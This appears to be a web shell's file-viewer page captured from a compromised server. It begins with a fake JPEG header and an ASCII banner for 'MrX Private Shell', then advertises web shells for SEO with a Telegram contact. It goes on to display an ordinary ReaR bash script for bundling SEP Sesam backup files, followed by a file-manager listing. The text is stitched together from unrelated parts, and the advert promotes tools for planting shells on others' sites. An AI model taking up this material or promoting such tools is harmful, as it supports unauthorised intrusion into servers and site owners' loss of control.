����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#
# prepare stuff for SEP Sesam
#
# detect where and if SEP Sesam client is installed on the system running
# REAR, include the needed bits in the recovery ISO
if [ -e /etc/sesam2000.ini ]; then
Log "Detected Sesam Installation"
source $SHARE_DIR/lib/sesam-functions.sh
# include sesam executables and configuration files
COPY_AS_IS+=(
"${COPY_AS_IS_SESAM[@]}"
$SHARE_DIR
$VAR_DIR
$SESAM_BIN_DIR
$SESAM_VAR_DIR
/etc/sesam2000.ini
)
# do not include certain sesam folders as generated boot
# image will grow too big if sesam listing and temporary
# files are included
COPY_AS_IS_EXCLUDE+=(
"${COPY_AS_IS_EXCLUDE_SESAM[@]}"
$SESAM_TMP_DIR
$SESAM_LIS_DIR
$SESAM_LGC_DIR
$SESAM_SMS_DIR
$SESAM_PROT_DIR
)
# include libssl as it is needed to run sesam sm_sshd if included
LIBS+=( /usr/lib*/libssl.so.* /usr/lib*/libcrypto.so.* )
fi
# Use a SEP sesam-specific LD_LIBRARY_PATH to find sesam client related libraries
# see https://github.com/rear/rear/pull/1817
LD_LIBRARY_PATH_FOR_BACKUP_TOOL="$SESAM_LD_LIBRARY_PATH"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 400_prep_sesam.sh | File | 1.24 KB | 0644 |
|